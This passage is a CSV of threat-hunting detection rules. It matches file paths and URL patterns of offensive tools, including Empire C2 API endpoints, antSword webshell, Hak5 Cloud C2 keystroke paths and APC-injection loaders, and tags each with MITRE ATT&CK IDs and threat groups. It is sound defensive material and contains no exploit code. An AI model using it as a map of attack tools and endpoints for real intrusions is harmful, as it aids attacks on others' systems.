"*/antSword-master.zip*",".{0,1000}\/antSword\-master\.zip.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","5331"
"*/antx-code/CVE-2022-0847*",".{0,1000}\/antx\-code\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/antx-code/CVE-2022-0847","1","1","N/A","N/A","N/A","1","58","21","2022-03-08T09:14:25Z","2022-03-08T09:10:51Z","5332"
"*/AoratosWin/*",".{0,1000}\/AoratosWin\/.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","5337"
"*/APC_Injection.cpp*",".{0,1000}\/APC_Injection\.cpp.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","1","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","5339"
"*/apc_injection.exe*",".{0,1000}\/apc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","5340"
"*/APCLdr.*",".{0,1000}\/APCLdr\..{0,1000}","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","N/A","4","316","54","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z","5341"
"*/api/admin/shutdown?token=*",".{0,1000}\/api\/admin\/shutdown\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5343"
"*/api/agents/*/kill?token=*",".{0,1000}\/api\/agents\/.{0,1000}\/kill\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5344"
"*/api/agents/all/kill?token=*",".{0,1000}\/api\/agents\/all\/kill\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5345"
"*/api/agents/all/shell?token=*",".{0,1000}\/api\/agents\/all\/shell\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5346"
"*/api/agents/CXPLDTZCKFNT3SLT/shell?*",".{0,1000}\/api\/agents\/CXPLDTZCKFNT3SLT\/shell\?.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5347"
"*/api/agents/stale?token=*",".{0,1000}\/api\/agents\/stale\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5348"
"*/api/agents/XMY2H2ZPFWNPGEAP?token=*",".{0,1000}\/api\/agents\/XMY2H2ZPFWNPGEAP\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5349"
"*/api/listeners/all?token=*",".{0,1000}\/api\/listeners\/all\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5351"
"*/api/modules/collection/*?token=*",".{0,1000}\/api\/modules\/collection\/.{0,1000}\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5352"
"*/api/modules/credentials*?token=*",".{0,1000}\/api\/modules\/credentials.{0,1000}\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5353"
"*/api/reporting/agent/initial?token=*",".{0,1000}\/api\/reporting\/agent\/initial\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5354"
"*/api/reporting/msg/*?token=*",".{0,1000}\/api\/reporting\/msg\/.{0,1000}\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5355"
"*/api/reporting/type/checkin?token=*",".{0,1000}\/api\/reporting\/type\/checkin\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5356"
"*/api/sites/1/devices/1/crocconfig*",".{0,1000}\/api\/sites\/1\/devices\/1\/crocconfig.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5357"
"*/api/sites/1/devices/1/deviceloot*",".{0,1000}\/api\/sites\/1\/devices\/1\/deviceloot.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5358"
"*/api/sites/1/devices/1/keystrokes/*",".{0,1000}\/api\/sites\/1\/devices\/1\/keystrokes\/.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5359"
"*/api/sites/1/devices/1/matchpayloads*",".{0,1000}\/api\/sites\/1\/devices\/1\/matchpayloads.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5360"
"*/api/stagers/dll?token=*",".{0,1000}\/api\/stagers\/dll\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5361"
"*/api/stagers?token=*",".{0,1000}\/api\/stagers\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 